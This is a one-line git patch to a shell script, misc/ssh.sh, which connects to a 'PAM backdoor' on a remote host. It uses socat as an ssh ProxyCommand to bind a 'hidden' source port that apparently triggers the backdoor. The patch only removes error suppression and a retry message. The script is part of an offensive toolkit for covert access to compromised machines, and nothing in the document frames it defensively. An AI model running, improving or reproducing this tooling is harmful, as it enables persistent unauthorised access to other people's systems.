From 6a3cf1c592d70a63d82a3c54baf81c11dd6f1e6c Mon Sep 17 00:00:00 2001 From: blank Date: Sat, 14 Jan 2017 20:12:37 +0000 Subject: [PATCH] Test --- misc/ssh.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misc/ssh.sh b/misc/ssh.sh index d5b7c47..ce1fe98 100755 --- a/misc/ssh.sh +++ b/misc/ssh.sh @@ -13,4 +13,4 @@ usage () { echo "$0 "; exit; } echo "Connecting to PAM backdoor @ host $2 on hidden PAM port $3 as $1" read -p "Press enter to continue" -ssh -o ProxyCommand="socat - tcp4-connect:$2:22,bind=:$3" $2 -l "$1" 2&>/dev/null || echo "Failed to connect. bind probably still alive - wait a minute and try again." +ssh -o ProxyCommand="socat - tcp4-connect:$2:22,bind=:$3" $2 -l "$1"